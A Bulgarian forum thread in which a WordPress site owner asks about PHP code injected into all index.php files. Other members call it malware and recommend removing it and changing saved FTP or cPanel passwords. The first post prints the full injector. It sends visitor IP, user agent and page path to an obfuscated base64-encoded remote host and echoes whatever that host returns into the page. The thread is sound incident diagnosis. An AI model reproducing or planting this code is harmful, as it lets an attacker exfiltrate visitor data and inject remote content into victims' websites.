Странен код в index.php файловете на wordpress

nobreak

Member
Здравейте. Някой може ли да ми каже за какво е този код? Гледам в лог файла на сайта ми един ден е вмъкнат във всички index.php файлове и забелязах, че сайта ми се забавя малко при първоначално зареждане.

?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2dsb2JhbGJvdHVwZGF0ZS5jb20vc3RhdC9zdGF0L nBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainnam e='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, ;
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
 
От: Странен код в index.php файловете на wordpress

И аз това се чудя какво дири...на 23 март, гледам всичките index.php са променени и имат този код...
 
ами някакви плъгини да си инсталирал в последно време? примерно?

с някакви нови папки да си се сдобил на хоста?

да имаш странно нарастване на CPU?

изобщо разгледай за аномалии и си припомни какво си правил следвайки ентусиазма на откривател.
 
От: Re: Странен код в index.php файловете на wordpress

ами някакви плъгини да си инсталирал в последно време? примерно?

с някакви нови папки да си се сдобил на хоста?

да имаш странно нарастване на CPU?

изобщо разгледай за аномалии и си припомни какво си правил следвайки ентусиазма на откривател.

За плъгини, възможно е да съм инсталирал...странни папки и повишено CPU не отчитам. Може с някой плъгин да съм го докарал, изпробвах доста плъгини за магазин, но не знам...
 
От: Странен код в index.php файловете на wordpress

Това е зловреден код - махай го. Заразен ти е целият хостинг акаунт - без значение какви и колко сайта имаш.

Най-вероятната причина да се получи е ако компа ти е бил заразен - има един ... да го кажем вирус, макар и да не е вирус, който взема всички запонени пароли в бровсера ти и качва този код през FTP. Пробери си дали имаш запомнени пароли за cpanel

Кога не е вреден ама е гаден - краде ти статистика. Махай го! И си провери всичко!

Пиши ако имаш нужда от помощ
 
От: От: Странен код в index.php файловете на wordpress

Това е зловреден код - махай го. Заразен ти е целият хостинг акаунт - без значение какви и колко сайта имаш.

Най-вероятната причина да се получи е ако компа ти е бил заразен - има един ... да го кажем вирус, макар и да не е вирус, който взема всички запонени пароли в бровсера ти и качва този код през FTP. Пробери си дали имаш запомнени пароли за cpanel

Кога не е вреден ама е гаден - краде ти статистика. Махай го! И си провери всичко!

Пиши ако имаш нужда от помощ

Благодаря за предложената помощ. Изтрих го от всички файлове, в които го имаше и сайта започна да си зарежда по бързо. Нямам запомнени пароли в браузъра.
 
От: Странен код в index.php файловете на wordpress

Провери и за запомнени пароли в ftp клиента. Най добре ги смени, защото може и от там да са те налазили. На мен се случи веднъж. Заби ми зловреден код във всички сайтове до които имах достъп през ftp. Много досадна работа.
 
От: Странен код в index.php файловете на wordpress

Нямам запаметени пароли. Предполагам кода се е инсталирал от някой плъгин, който съм пробвал. От както изтрих кода от файловете, проблем няма...
 

Горе